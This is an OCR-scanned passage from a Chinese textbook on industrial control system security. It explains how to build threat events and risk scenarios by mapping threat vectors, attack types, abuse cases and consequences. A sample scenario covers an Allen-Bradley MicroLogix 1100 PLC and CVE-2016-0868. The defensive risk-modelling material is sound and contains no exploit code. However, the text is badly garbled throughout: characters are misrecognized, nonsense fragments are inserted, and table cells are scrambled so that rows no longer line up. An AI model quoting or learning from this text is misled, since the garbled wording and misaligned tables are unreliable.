什么 必须 采取 该 步骤 (识别 攻击 向 量 ) 的 一 个 完美 例子 。 在 风险 评估 过 程 中 的 网 络 体系 结构 审查 步骤 期 | 间 采集 到 的 大 量 信 息 ， 以 及 在 脆弱 性 识别 步骤 期 间 识别 出 
的 所 有 漏洞 和 开放 端口 都 会 对 该 步骤 有 所 帮助 。 


Osz 


可 以 将 威胁 向 量 和 通信 路 径 数 据 “ 履 盖 ” 在 依据 普 渡 参考 模型 (如 第 1 章 中 介绍 的 ) 所 绘制 的 网 络 图 表 中 ， 以 便 查 看 在 每 个 区 域 中 进行 通信 的 位 置 以 及 潜在 威 
胁 的 位 置 。 


威胁 向 量 识别 最 初 开始 于 风险 评估 过 程 的 第 1 阶段 ， 即 对 网 络 染 构 和 数据 流 图 进行 审查 的 时 候 ( 见 第 2 章 ) 。 在 此 步骤 中 ， 需 要 对 所 友 现 的 通信 路 径 和 数据 流 
进行 更 加 深入 的 评估 ， 以 确定 实际 的 潜在 威胁 向 量 。 表 3-2 列 出 了 应 该 考虑 的 常见 工控 系统 威胁 向 量 。 


表 3-2 ”常见 威胁 向 量 


访问 向 量 可 能 的 威胁 或 攻击 向 量 


相 邻 的 内 部 网 络 (有 线 网 络 或 以 太 网 )， 例 如 业务 网 络 或 非 军事 区 (通常 来 
自 男 一 个 被 入侵 设备 ) 

KAHRA (如 工程 师 站 ) 的 被 入 侵 双 和 窒 主 设备 

本 地 网 络 中 的 被 入 侵 设 备 

互联 网 (包括 云 和 多 租户 环境 ) 

WiFi 网络 ( 无 线 局 或 网 ) 

隧道 分 离 (位 于 不 安全 远程 站 点 的 工作 人 员 通 常 使 用 VPN 访问 网 络 ) 

其 他 无 线 电 连接 方式 ， 例如 HART, 、ZigBee、 卫 星 链 路 等 


其 他 设备 、 控 制 需 等 
诸如 HVAC 的 其 他 系统 


网 络 服务 端口 (工业 协议 使 用 的 端口 ， 例 如 Modbus 协议 的 502 端口 、 
SSH 协议 的 22 ee 程 桌 面 端口 的 3389 端口 等 ) 

文件 输入 或 插入 

用 户 输入 (包括 本 地 应 用 程序 和 Web 界面 ) 

数据 输入 ， 例 如 库 晒 数 和 动态 链接 库 等 


USB 接口 (不 只 是 USB 闪存 驱动 器 ， 还 包括 使 用 USB 接口 的 外 设 ， 例 如 
键盘 等 ) 
物理 访问 串口 
其 他 数据 端口 ， 例 如 SATA/eSATA, HDMI, Display Port 等 
键盘 或 鼠标 输入 《因为 该 输入 可 能 来 自 于 攻击 者 ) 


通过 电话 或 人 员 和 直接 进行 社交 互动 
人 员 / 用户 (社会 工程 学 电子 邮件 与 社交 媒体 
客户 端 应 用 程序 ， 例 如 电子 邮件 客户 闫 、 互 联网 浏览 大 等 


心 片 或 硬件 的 复 改 
应 用 程序 或 固件 代码 的 复 改 


网 络 


[ 控 系 统 系 统 及 设备 


(运行 在 工作 站 、 服 务 问 和 设备 
中 的 ) 应 用 程序 


L29. 


攻击 者 很 可 能 将 上 述 威胁 向 量 中 的 两 个 或 多 个 加 以 组 合 以 实现 其 目标 。Havex 恶 意 代 码 是 用 到 多 种 威胁 向 量 的 一 个 典型 例子 。 有 关 Havex 的 更 多 信息 ， 请 参阅 
前 面 讨 论 的 工控 系统 杀伤 链 的 文章 或 者 第 8 章 。 


4. 汇 总 

威胁 事件 中 的 最 后 一 块 拼图 是 目标 对 象 以 及 目标 对 象 的 漏洞 ， 其 中 目标 对 象 的 漏洞 已 经 在 之 前 风险 评估 过 程 的 第 2 阶段 确定 。 现 在 是 时 候 把 所 有 的 拼图 拼 在 一 
起 了 ， 下 面 开 始 介绍 如 何 构建 潜在 威胁 事件 和 可 行 的 风险 场景 。 

(1) 构建 可 行 工 控 系统 威胁 事件 


由 于 本 书 主要 聚焦 于 网 络 安全 事件 ， 威 胁 事 件 (也 称 之 为 “攻击 树 ”) 表示 了 将 现 有 威胁 源 、 威 胁 向 量 、 目 标 对 象 和 目前 已 识别 出 的 漏洞 加 以 组 合 所 可 能 引 
发 的 潜在 攻击 。 〈 如 果 想 对 威胁 事件 进行 扩展 来 包含 非 恶 意 事件 ， 例 如 自然 灾害 和 人 类 所 导致 的 不 利 因素 ， 融 会 友 现 该 过 程 肯定 也 是 能 够 文 持 这 种 扩展 的 。) 构 
成 威胁 事件 的 每 个 要 素 大 多 都 是 简单 直观 的 。 例 如 ， 要 么 存在 目标 对 象 ， 要 么 不 存在 目标 对 象 ， 要 么 目标 对 象 中 包含 漏洞 ， 要 么 目标 对 象 没有 上 漏洞， 要 么 存在 威 
胁 向 量 指向 某 一 漏洞 ， 要 么 没有 威胁 向 量 指向 该 漏洞 。 但 是 ， 由 于 攻击 类 型 、 技 术 和 策略 所 涉及 的 内 容 相当 广泛 ， 在 界定 有 天 威胁 事件 (攻击) 的 概念 时 具有 一 
定 的 推测 性 ， 所 以 要 求 具 备 网 络 安全 攻击 方法 和 技术 方面 的 专业 知识 ， 以 及 对 被 评估 系统 有 着 全 面 的 了 解 。 这 也 是 为 什么 验证 每 个 攻击 场景 真正 的 可 行 性 ， 以 及 
准确 地 估计 事件 友 生 的 可 能 性 如 此 重要 的 原因 之 一 。 


在 界定 忌 体 风 险 场景 的 概念 时 ， 有 三 个 主要 方面 需要 考虑 。 这 些 方面 有 助 于 直观 地 了 解 总 体 攻击 策略 : 


- 实际 的 攻击 类 型 (类 别 ) 能 够 发 起 攻击 并 实现 目标 的 总 体 向 量 和 漏洞 利用 工具 。 
- 即时 目标 (或 “滥用 案例 ”) ”为 实现 攻击 后 果 而 采取 的 行动 。 
. 后 续 结果 ”最终 的 结果 。 


例如 ， 为 了 获取 远程 代码 执行 和 管理 员 权限 ， 对 工程 师 站 中 的 网 络 应 用 程序 进行 远程 漏洞 利用 的 行为 就 被 看 作 是 一 种 “攻击 ”， 而 利用 管理 员 权 限 来 更 改 可 
访问 到 的 PLC 中 的 逻辑 则 被 看 作 是 一 种 “目标 ”或 者 “滥用 案例 ”。 最 后 ， 导 致 涡轮 失去 控制 的 结果 则 是 一 种 “后 果 ”。 很 多 人 混淆 了 “攻击 ”和 “目标 ”、 
“滥用 案例 ”的 概念 ， 在 使 用 这 两 个 术语 时 未 加 区 分 。 由 于 攻击 类 型 组 合 的 数量 与 可 能 性 迅速 增长 ， 这 融 使 得 攻击 类 型 看 起 来 似乎 有 无 限 多 种 。 然 而 ， 正 如 所 有 
漏洞 都 会 属于 某 一 种 类 别 一 样 ， 攻 击 也 是 如 此 。 因 此 ， 为 了 避免 在 确定 攻击 类 型 时 面 对 众 多 攻击 类 型 而 不 知 所 措 ， 有 必要 了 解 已 经 明确 的 攻击 类 型 。 攻 击 类 型 的 
实例 列表 如 表 3-3 所 示 。 之 后 ,我们 将 这 些 攻击 类 型 与 表 3-5 中 详细 摘 述 的 常见 滥用 案例 相关 联 ， 最 后 得 到 表 3-6 所 示 的 潜在 (或 预期 ) 后 果 ， 以 完成 一 个 完整 风险 
场景 的 构建 。 我 们 在 这 里 提出 这 些 内 容 的 原因 在 于 练习 ， 人 在 某 些 情况 下 可 以 从 潜在 后 果 开 始 反 向 分 析 ， 进 而 确定 导致 特定 攻击 后 果 的 攻击 序列 和 攻击 向 量 等 内 容 
会 更 有 意义 。 


还 需要 特别 注意 的 是 ， 表 3-3、 表 3-5 和 表 3-6 很 可 能 并 没有 完整 地 包含 所 有 相关 内 容 ， 这 是 因为 网 络 威胁 是 不 断 变化 的 。 但 是 ， 这 些 表格 一 方面 可 以 作为 覆盖 
全 面 、 内 容 凝 炼 的 基准 (或 者 作为 构建 自己 基准 表 的 一 个 示例 ) ， 另 一 方面 可 以 作为 构建 场景 的 逻辑 方法 。 遵 循 这 种 方法 将 会 使 得 威胁 事件 建 模 的 过 程 更 为 简 
化 、 耗 时 更 少 ， 并 且 很 可 能 也 更 为 准确 且 没有 那么 多 随意 性 。 


表 3-3 ”常见 攻击 类 型 


类 J 
网 络 


未 经 号 份 认 证 的 情况 


网 络 设备 


Web/ 互 联网 


WR A Sina 


Z J Sig 


主机 (工作 站 与 服务 器 ) 


未 经 身份 认证 的 情况 


攻击 类 型 


网 络 服务 或 应 用 攻击 

口令 猜 解 、 字 典 攻击 

骏 力 口令 破解 攻击 

散 列 认证 规避 

网 络 口 令 交 换 咒 探 

中 间 人 攻击 (MITM ) 

Q 记录 与 重 放 

OQ SSL 证 书 欺 骗 

J SSH 密 钥 其 驴 

Ri ed a Ae 
拒绝 服务 攻击 (DOS) 

分 布 式 拒绝 服务 攻击 (DDoS ) 
ARP 重 定 问 、 投 毒 

协议 攻击 

J 路 由 欺骗 

O 数据 包 插 入 

O 管理 协议 攻击 

Q SNMP 请 求 与 陷阱 处 理 
DNS 投 毒 

TCP 会 话 劫持 


VLAN 跃进 或 跳跃 
生成 树 协 议 攻 击 (重新 计算 STP ) 


VLAN 中 继 协 议 (VLAN Trunking Protocol, 


MIBiz, & 


源 代 码 复 改 

规范 化 攻击 

服务 各 扩展 攻击 

缓存 区 溢出 【参见 “应 用 程序 ”天 别 ) 
应 用 程序 攻击 (参见 “应 用 程序 ”类 别 ) 
文件 包含 (包括 本 地 和 远程 ) 


JavaScript 和 活动 脚本 攻击 
Cookie KA ii Hi HRM ANTS 
站 脚本 攻击 (XSS) 
跨 站 请 求 伪造 (CSRF ) 
SQL 注入 
跨 框 架 或 跨 域 攻击 
电子 邮件 、 即 时 通信 工具 、 浏 览 絮 攻击 (参见 


设备 驱动 程序 攻击 
冷 启动 (可 移动 介质 ) 密码 旁 路 
拒绝 服务 攻击 (DoS) 


VTP) 攻击 


“应 用 程 友 ” 


类 ) 


类 J aan 
口令 提取 、 口 令 破 解 
存在 身份 认证 的 情况 ee 
端口 重 定向 


(127TH LPIA, ARS ee Mine PA) 应 用 程序 


内 存 损坏 攻击 

释放 后 使 用 攻击 (Use after free attacks ) 
BAF DX tat HH BC 

Q fk 

a H 

RSA TE AB PTR 

输入 验证 攻击 

整 型 洲 出 或 整 型 符号 攻击 

悬垂 指针 攻击 

大 小 差 一 攻击 (Off by one attacks) 
文件 、 页 面 文件 交换 攻击 

共享 库 或 第 三 方 库 攻击 

网 络 钓鱼 、 鱼 义 式 网 络 钓鱼 攻击 
水 坑 攻击 

社交 媒体 攻击 


人 员 /用 户 * 
* 这 些 攻击 会 对 之 前 列 出 的 攻击 类 型 加 以 利用 


roy 
©). 


其 中 的 某 些 攻击 类 型 经 常 相互 结合 在 一 起 使 用 ， 甚 至 有 些 攻击 类 型 会 依赖 于 另 一 种 攻击 类 型 来 实现 某 一 目标 。 以 拒绝 服务 (Denial of Service, DoS) 攻击 为 
例 ， 从 技术 上 讲 ，DoS 是 一 个 目标 ， 而 不 是 一 种 潜在 的 攻击 类 型 。 但 是 DoS 通 常 也 被 看 作 是 一 种 “攻击 ”类 型 ， 因 此 教条 地 来 说 DoS 攻 击 实际 上 也 是 由 其 他 攻击 类 
型 所 组 成 的 ， 所 以 在 表 3-3 中 也 列 了 出 来 。 


Osz 


经 验 丰 富 的 渗透 测试 人 员 应 该 熟悉 表 3-3 中 所 列 出 的 攻击 ， 并 了 解 它 们 是 如 何 同 表 3-5 中 所 列 出 的 攻击 目标 相关 联 的 。 请 记 住 ， 渗 透 测 试 中 许多 方面 的 专业 程度 
都 非常 高 。 所 以 ， 对 于 一 个 人 来 说 ， 在 渗透 测试 的 各 个 方面 都 成 为 顶级 专家 是 相当 困难 的 。 因 此 ， 一 支 渗 透 测 试 团队 大 多 是 由 多 名 在 不 同方 向 上 具有 技术 特长 的 
渗透 测试 人 员 所 组 成 的 。 第 5 章 和 第 6 章 对 表 3-3 中 所 列 出 的 与 工控 系统 有 关 的 攻击 类 型 进行 了 详细 介绍 。 如 果 想 对 攻击 与 漏洞 利用 进行 更 加 深入 的 了 解 ， 我 们 将 在 
本 章 末 尾 给 出 一 些 参 考 资料 。 而 在 第 4 章 也 对 本 章 风险 建 模 表 中 的 部 分 工控 系统 攻击 策略 进行 了 描述 。 


至 此 ， 我 们 已 经 得 到 了 资产 (目标 对 象 ) 同 与 之 关联 的 攻击 向 量 、 漏 洞 以 及 可 以 实施 的 攻击 类 型 之 间 的 映射 关系 列表 。 但 是 要 记 住 ,该 映射 关系 列表 应 当 特 
定 于 用 户 环 境 并 与 之 密切 相关 。 因 此 在 整个 过 程 中 ， 只 需要 记 下 适用 于 用 户 业 务 、 运 营 、 环 境 和 系统 的 表 项 即 可 。 而 完成 威胁 事件 或 攻击 建 模 过 程 ， 还 需要 在 所 
有 相关 表 项 之 间 建 立 关 联 关系 ， 如 表 3-4 所 示 。 


表 3-4 ”PLC 威胁 事件 示例 


潜在 威胁 源 攻 Ot 漏 油 目标 对 象 


到 家 资助 的 攻击 : Fi 
国家 资助 的 攻击 者 Web 界面 Allen-Bradley 


内 部 人 员 /前 内 部 人 员 | 基于 栈 的 缓存 区 溢出 CVE-2016-0868 
lit AY | ] J} 基于 栈 J RAT imt LL] 本 地 网 络 MicroLogix 1100 
TUN 局、 = 


至 此 就 得 到 了 基本 的 威胁 事件 ， 读 者 可 以 使 用 该 威胁 事件 来 完成 整体 风险 场景 的 创建 。 
(2) 构建 风险 场景 


既然 已 经 对 潜在 的 威胁 事件 进行 了 映射 ， 那 么 就 可 以 通过 添加 滥用 案例 以 及 攻击 后 果 的 方式 ， 使 用 威胁 事件 来 开始 构建 更 为 完整 的 风险 场景 。 (需要 牢记 的 
是 ， 识 别 潜在 后 果 要 从 风险 评估 过 程 的 第 1 阶段 开始 ， 对 此 我 们 已 经 在 第 2 草 中 进行 了 讨论 。) 界定 滥用 案例 或 攻击 目标 、 攻 击 后 果 的 概念 可 能 比 我 们 当前 所 做 的 
工作 主观 性 更 强 一 些 ， 并 且 在 开始 时 也 没有 一 个 良好 的 基准 ， 这 可 能 是 一 个 较为 曲折 的 过 程 。 下 面 给 出 的 表 3-5 和 表 3-6 可 以 作为 开始 这 一 工作 的 一 个 不 错 的 起 


Fa, BPI SMTP A ET. 


表 3-5 常见 工控 系统 滥用 案例 及 攻击 目标 


资产 /系统 滥用 案例 / 攻击 目标 


通过 扫描 与 枚 举 方 法 探测 所 使 用 的 工控 系统 设备 、 工 作 站 和 协议 

通过 网 络 嗅 控 获 取 认 证 信息 

通过 嗅 探 数据 包 并 对 其 进行 逆 癌 分析 获取 工控 系统 协议 信息 
工控 系统 网 络 记录 或 重 放 工控 系统 网 络 流 量 以 尝试 更 改 设备 行为 

注入 数据 或 数据 包 以 尝试 更 改 设备 行为 

伪造 、 欺 骗 工 控 系 统 网 络 数 据 包 以 尝试 更 改 设备 行为 

伪造 、 欺 骗 工 控 系 统 网 络 数 据 包 以 尝试 更 改 人 机 界面 画面 


获取 远程 访问 或 控制 权限 

自 改 、 屏 项 控制 大 的 输入 或 输出 数据 

修改 配置 以 更 改 控制 带 行 为 

修改 控制 算法 以 更 改 控 制 希 行为 

修改 动态 数据 以 更 改 控制 算法 的 结果 

修改 IO 数据 以 更 改 控制 算法 的 结果 

修改 控制 器 固件 以 更 改 控制 器 的 行为 

使 用 欺骗 性 指令 以 更 改 控制 此 行为 (通过 网 络 协 议 ) 
降级 攻击 、 拒 绝 服务 攻击 

持久 驻 留 (恶意 代码 ) 


权限 提升 

获取 远程 访问 或 控制 权限 

复制 或 泄漏 敏感 信息 

修改 或 删除 信息 (如 标签 图 形 或 XML 文件 ) 
工程 师 站 修改 存储 的 配置 信息 

修改 在 线 配 置信 息 

E PE hill HE AC TK 

持久 驻 留 (恶意 代码 ) 

降级 攻击 、 拒 绝 服务 攻击 


控制 大 


资产 / 系统 滥用 案例 /攻击 目标 


权限 提升 

获取 远程 访问 或 控制 权限 
复制 或 泄漏 敏感 信息 

回 控 制 需 发 送 命令 

修改 或 删除 信息 (如 标签 图 形 或 XML 文件 ) 
修改 存储 的 配置 

持久 驻 留 (恶意 代码 ) 

降级 攻击 、 拒 绝 服 务 攻击 


权限 提升 

获取 远程 访问 或 控制 权限 

复制 或 泄漏 敏感 信息 

修改 数据 库 、 标 签 数据 
应 用 服务 着 修改 或 删除 信息 

持久 驻 留 (恶意 代码 ) 

过 程 通信 和 中断 

人 机 界面 过 程 图 像 中 断 

降级 攻击 、 拒 绝 服务 攻击 


权限 提升 

获取 远程 访问 或 控制 权限 

复制 或 泄漏 敏感 信息 
SCADA 服务 器 修改 数据 库 、 标 签 数 据 

修改 或 删除 信息 

持久 驻 留 (恶意 代码 ) 

降级 攻击 、 拒 绝 服 务 攻击 


权限 提升 
获取 远程 访问 或 控制 权限 
复制 或 泄漏 敏感 信息 

[ 业 实 时 历史 数据 库 修改 数据 库 、 标 签 数 据 
修改 或 删除 信息 
持久 驻 留 (恶意 代码 ) 
降级 攻击 、 拒 绝 服务 攻击 


胁迫 工作 人 员 获 取信 息 
诱 骊 工作 人 员 犯 错 或 者 做 出 不 当 操作 的 决策 


操作 员 站 、 人 机 界面 


人 员 或 用 户 〈 机 构 、 操 作 人 员 ) 


表 3-5 中 所 列 出 的 示例 内 容 肯 定 还 不 是 一 个 完整 的 列表 ， 因 为 这 些 滥用 案例 出 现 的 可 能 性 将 随 着 过 程 能 力 的 增强 而 提高 且 也 会 根据 其 所 处 环境 的 不 同 有 所 变 
化 。 表 中 所 列 出 的 是 整个 行业 中 在 报告 中 最 常 出 现 的 且 接 受 程度 也 最 高 的 工控 系统 特定 场景 基线 ， 可 以 将 其 作为 风险 评估 工作 的 起 点 ， 也 可 以 将 其 作为 保障 威胁 
建 模 过 程 质量 的 检查 列表 。 还 需要 注意 的 是 ， 表 3-6 仪 限于 针对 工控 系统 的 后 果 。 根 据 评估 范围 ， 可 能 还 需要 考虑 其 他 资产 ,例如 防火 墙 、 路 由 器 、 交 换 机 和 业务 
系统 等 。 同 上 述 其 他 设备 与 系统 相关 的 后 果 已 经 在 行业 中 的 其 他 文献 里 进行 了 详细 介绍 ， 因 此 超出 了 本 章 的 范围 。 


表 3-6 工控 系统 遭受 攻击 后 的 潜在 后 果 


目标 对 象 潜在 后 果 


FE till ait Lb FL BEAR AS 
工厂 陷入 混乱 或 停工 
过 程 退 化 、 过 程 故 障 
过 程控 制 中 断 
过 程 图 像 中 断 
传 感 咒 数据 损坏 


工厂 陷入 混乱 或 停工 
工厂 居 动 延迟 
ELAR I E A Er 
操作 员 图 形 界面 的 未 授权 操作 
过 程 操 作 的 不 当 啊 应 
工控 系统 数据 库 的 未 授权 改动 

工程 师 站 临界 状态 、 报 警 国 值 的 未 授权 改动 
存在 缺陷 的 固件 的 未 授权 分 发 
工控 系统 设备 的 未 授权 启动 、 关 闭 
过 程 、 工 厂 信 息 泄漏 
工控 系统 设计 或 应 用 程序 认证 信息 汇 汤 
工控 系统 访问 控制 机 制 的 未 授权 改动 
对 大 多 数 工 控 系 统 资产 的 未 授权 访问 (跳板 攻击 ) 


工厂 陷入 混乱 或 停工 

对 临界 状态 、 报 警 辣 值 的 抑制 

产品 质量 

工厂 效率 、 过 程 效 率 

认证 信息 泄漏 (控制 ) 
工厂 、 运 营 信 息 泄漏 

对 工控 系统 资产 的 未 授权 访问 (跳板 攻击 ) 
对 工控 系统 资产 的 未 授权 访问 (通信 协议 ) 


对 过 程 或 批 处 理 记录 的 操纵 
认证 信息 泄漏 (业务 ) 
工业 实时 历史 数据 库 认证 信息 泄漏 (控制 ) 
对 其 他 业务 资产 的 未 授权 访问 ,例如 MES, ERP 等 (跳板 攻击 ) 
对 其 他 业务 资产 的 未 授权 访问 (跳板 攻击 ) 


工厂 陷入 混乱 或 停工 

认证 信息 泄漏 (控制 ) 
敏感 、 机 密 信息 泄漏 

对 其 他 业务 资产 的 未 授权 访问 (跳板 攻击 ) 
工厂 陷入 混乱 或 停工 

TJ JA oy EIR 

机 械 损 坏 或 被 蓄意 破坏 

对 操作 员 图 形 界面 的 未 授权 操作 
对 过 程 操 作 的 不 当 啊 应 

工控 系统 数据 库 的 未 授权 改动 
临界 状态 、 报 警 国 值 的 未 授权 改动 
工控 系统 设备 的 未 授权 启动 、 关 闭 


控制 器 (PLC) 


操作 员 站 (人 机 界面 ) 


Wh FA NRA A 


SCADA 服务 器 


目标 对 象 


SCADA 服务 器 


功能 安全 系统 


环境 控制 


状态 监视 系统 


火灾 探测 和 灭火 系统 


主 站 设备 和 (或) 从 站 设备 


分 析 仪 或 分 析 仪 管理 系统 


用 户 : 工控 系统 工程 师 


HP: 工控 系统 技术 人 员 


潜在 后 果 


认证 信息 泄漏 (控制 ) 

工厂 、 运 党 信息 泄漏 

工控 系统 访问 控制 机 制 的 未 授权 改动 

对 大 多 数 工 控 系 统 资产 的 未 授权 访问 (跳板 攻击 、 直 接 访 问 ) 
对 工控 系统 资产 的 未 授权 访问 (通信 协议 ) 

业务 资产 的 未 授权 访问 (跳板 攻击 ) 


Ly FL 
装备 损坏 或 被 蓄意 破坏 
环境 影 啊 
人 号 伤亡 


产品 质量 (下降 ) 


LN ri FE ( 受 损 ) 


冷却 或 加 热 过 程 的 中 断 
be Far RE, KHL 


装备 损坏 或 被 蓄意 破坏 

工厂 陷入 混乱 或 停工 

对 其 他 工控 系统 资产 的 未 授权 访问 (跳板 攻击 ) 
灭火 剂 的 未 授权 释放 

装备 故障 、 关 机 

工厂 陷入 混乱 或 停工 

工厂 局 动 延 述 

机 械 损 坏 或 被 蓄意 破坏 

对 控制 操作 的 不 当 啊 应 

对 临界 状态 、 报 和 警 国 值 的 抑制 


产品 质量 (下 降 ) 

瑕 疫 、 生 产 损失 、 收 入 损失 

声誉 ( 受 损 ) 

产品 召回 ， 产 品 可 菲 性 

过 程 、 工 厂 信 息 泄漏 

工控 系统 设计 或 应 用 程序 认证 信息 泄漏 
对 业务 资产 的 未 授权 访问 (跳板 攻击 ) 

对 工控 系统 资产 的 未 授权 访问 (跳板 攻击 ) 
工厂 陷入 混乱 或 停工 

工厂 局 动 延 开 

机 械 损 坏 或 被 蓄意 破坏 

对 操作 员 图 形 界 面 的 未 授权 操作 

对 过 程 操作 的 不 当 啊 应 

工控 系统 数据 库 的 未 授权 改动 

临界 状态 、 报 警 国 值 设 置 的 未 授权 改动 
存在 缺陷 的 固件 的 未 授权 分 发 

工控 系统 设备 的 未 授权 启动 、 关 闭 

设计 信息 汇源 

工控 系统 应 用 认证 信息 泄漏 

对 大 多 数 工 控 系 统 资产 的 未 授权 访问 〈 跳 板 攻击 ) 


目标 对 象 潜在 后 果 


陷 人 混乱 或 停工 
me 或 被 蓄意 破坏 
机 械 设备 的 未 授权 启动 、 关 闭 
HÈ: 工厂 操作 员 YE, C F EE 
AUENA Sits 
对 业务 资产 的 未 授权 访问 (跳板 攻击 ) 
对 工控 系统 资产 的 未 授权 访问 (通信 协议 ) 


最 终 得 到 的 是 初始 威胁 事件 ， 连 同 它们 适用 的 滥用 案例 和 后 果 ， 如 表 3-7 所 示 ， 表 中 展示 了 一 个 基本 风险 场景 。 


在 进行 网 络 通 信 路 径 和 数据 流 审 查 时 ， 还 会 友 现 与 之 存在 通信 路 径 的 其 他 资产 。 因 此 ， 对 于 一 个 更 加 全 面 的 场景 而 言 ， 这 些 关 联 关 系 也 应 该 加 以 记录 。 这 样 
做 能 够 进一步 找到 可 能 导致 工控 系统 后 果 的 其 他 事件 序列 ， 而 不 是 仪 仪 考虑 存在 漏洞 的 单个 目标 对 象 。 例 如 ， 使 用 表 3- 7 中 描述 的 场景 ， 我 们 还 找 出 了 同 PLC 之 间 
存在 连通 关系 的 工程 师 站 ( 见 表 3-8) 。 


我 们 现在 将 该 特定 工作 站 添加 进 PLC 威 胁 事件 场景 中 的 威胁 向 量 列表 ， 如 表 3-9 所 示 ， 尤 其 是 已 知 工作 站 存在 漏洞 之 后 。 还 可 以 列 出 所 有 已 知 连接 到 该 PLC 的 
其 他 设备 、 工 作 站 、 服 务 器 等 ， 但 在 大 型 环境 中 这 么 做 可 能 会 非常 麻烦 。 


表 3-7 PLC 风 险 场 景 示例 


滥用 案例 / 


潜在 威胁 源 办 向 量 ik ie 目标 对 象 攻击 目标 潜在 后 果 
控制 器 处 于 故障 
wael S 
国家 资助 的 a 过 程 退化 、 过 程 
攻击 首 基于 栈 a Web 界面 Allen-Bradley 获取 完 整 的 alas 
为 部 人 员 或 VE- F Paa IAAT TIED: sf H re 
Miia 人 员 或 缓存 区 溢出 | 本 地 网 络 CVE-2016-0868 MicroLogix 1100 | 控制 权限 nahi 中 Wi 
AY Ala A B 修改 配置 以 过 程 图 像 中 断 
sal 下 恋 过 程 行为 | ”传感器 数据 损坏 


Be Fa MAM r 
意 破 坏 


因此 ， 在 大 多 数 情况 下 ， 将 已 知 存 在 漏洞 的 资产 或 者 同 有 关 资 产 存在 特定 天 系 (例如 远程 连接 和 控制 ) 的 资产 列 为 可 采用 的 威胁 向 量 是 很 有 道理 的 。 


接 下 来 ， 不 仪 要 跟 趴 单个 资产 的 每 个 风险 场景 ， 还 要 建立 这 些 风 险 场景 之 间 彼 此 的 关联 。 这 样 束 构建 了 一 个 “整体 架构 范围 ”内 的 风险 场景 矩阵 ， 从 而 使 分 
析 人 员 能 够 从 一 个 更 加 全 面 的 视角 来 了 解 整体 攻击 面 和 安全 状态 。 


表 3-8 工程师 站 风险 场景 示例 


混用 案例 / l 


执行 任意 代码 
用 户 或 工程 师 获取 管理 员 控制 DRD 意 破 坏 
在 Web 浏览 器 中 权限 对 过 程 操作 的 不 当 啊 应 
国家 资助 的 攻 通过 以 下 方式 打 CVE-2016- 运行 Windows 利用 跳板 实施 aa 报警 闵 值 的 未 授权 改动 
击 者 内 核 模 式 驱动 开 恶意 文件 ， 0005 (CVE-2016- | 7 SP1 及 IE 浏 | 对 其 他 工控 系统 | ”存在 缺陷 的 固件 的 未 授权 分 发 
内 部 人 员 或 前 | 攻击 导致 的 内 存 l 0008) (CVE-016- | 览 器 的 工程 师 站 | 资产 的 攻击 [ 控 系 统 设备 的 未 授权 启动 、 关 闭 
损坏 网 络 0009) (PCDENG-0024) | ”对 操作 图 形 界 | ”工控 系统 访问 控制 机 制 的 未 授权 
AR 面 的 未 授权 操作 “| 改动 


邻接 网 络 
互联 网 


获取 对 其 他 工 对 工控 系统 资产 的 未 授权 访问 
控 系 统 资产 的 直 | (跳板 攻击 ) 
接 控制 权限 


表 3-9 ” 带 有 关联 威胁 向 量 的 PLC 风 险 场 景 示例 


潜在 威胁 源 | 攻 击 | 威胁 向 量 | 漏 m| 目标 对 象 | 滥用 案例 / 潜在 后 果 
攻击 目标 


执行 任意 | ”控制 各 处 于 故障 状态 


到 家 资助 ; me edie i m 
Ms r Web 界面 代码 过 程 退 化 、 过 程 故 障 
ye =] E , - ` j = 
` : 本 地 DEZ P 又 完整 1 征程 73 生 || y 1 PEF 
内 部 人 员 | EFIK Lakin CVE-2016- | Allen-Bradley RR sitaan 
basa bes [ 程 师 站 的 控制 权限 | ”过程 图 像 中 断 
或 前 内 部 人 | 缓存 区 溢出 0868 MicroLogix 1100 cae ee = 
= ( PCD-ENG- 修改 配置 | 传 感 副 数据 损坏 
JA , a ae 
o ayer 0024 ) 以 改变 过 程 | ”机 械 损坏 或 被 蓄意 破 


行为 


Os 


这 里 所 使 用 的 方法 只 是 用 一 个 电子 表格 来 对 所 有 场景 、 数 据 和 相关 性 进行 记录 。 当 然 读 者 也 可 以 发 挥 创意 使 用 网 络 图 (network diagram) 之 类 的 其 他 工具 来 展 
示 容易 遭受 攻击 的 路 径 ， 并 进一步 采用 可 视 化 方法 对 这 些 场景 进行 说 明 。 这 些 信 息 与 现实 中 的 架构 图 相 结合 能 够 发 挥 巨大 的 作用 。 在 撰写 本 文 时 ， 市 场 上 的 大 多 
数 威胁 建 模 工具 或 应 用 程序 更 倾向 于 针对 特定 应 用 程序 进行 威胁 建 模 ， 因 为 它 与 软件 开发 生命 周期 (Software Development Life Cycle, SDLC) 息息相关 。 但 是 ， 如 
果 有 工具 能 够 记录 并 关联 所 有 这 些 信 息 ， 从 整个 基础 设施 的 视角 对 场景 构建 过 程 予以 帮助 ， 那 么 将 会 大 有 神 盖 。 


最 后 ， 我 们 将 具有 现实 意义 的 威胁 情报 与 态势 感知 相 结 合 ， 从 实际 情况 来 看 可 操作 性 还 是 比较 高 的 。 通 过 增加 从 风险 评估 中 获得 的 信息 (或 者 将 威胁 建 模 添 
加 到 风险 评估 过 程 中 来 ) ， 我 们 束 可 以 使 用 打分 或 评级 系统 对 风险 场景 进行 优先 级 排序 ， 进 一 步 寺 善行 动 计划 。 


©... 


oy 


我 们 此 时 已 经 开始 更 多 地 进入 到 “风险 评估 ”的 领域 中 ， 而 不 只 是 标准 的 威胁 建 模 过 程 。 但 需要 指出 的 是 ， 现 在 “威胁 建 模 ”和 “风险 评估 ”已 经 融合 在 一 
起 了 。 


风险 评估 主要 是 通过 为 某 些 要 素 进行 评级 打分 或 分 配 权重 来 实现 这 一 过 程 ， 如 表 3-10 所 示 。 


有 许多 方法 可 以 用 来 推导 严重 性 、 关 键 性 和 可 能 性 的 分 数 ， 我 们 已 经 对 其 中 部 分 内 容 进行 了 讨论 。 例 如 ，CVSS 工 具 可 以 用 来 帮助 确定 漏洞 的 严重 性 和 攻击 的 
可 能 性 ,诸如 CSET 之 类 的 工具 则 可 以 用 来 帮助 确定 资产 以 及 (或 者 ) 系统 的 天 键 性 。 类 似 于 NIST SP800-30 之 类 的 指南 建议 可 以 为 风险 评 佑 过程 提供 指导 ， 读 者 
甚至 还 可 以 根据 所 采用 的 方法 制订 出 自己 的 评分 标准 。 最 重要 的 一 点 在 于 ， 米 用 适合 自己 的 方法 ， 并 且 让 风险 评估 过 程 所 涉及 的 人 员 都 清楚 地 理解 这 种 方法 ， 而 
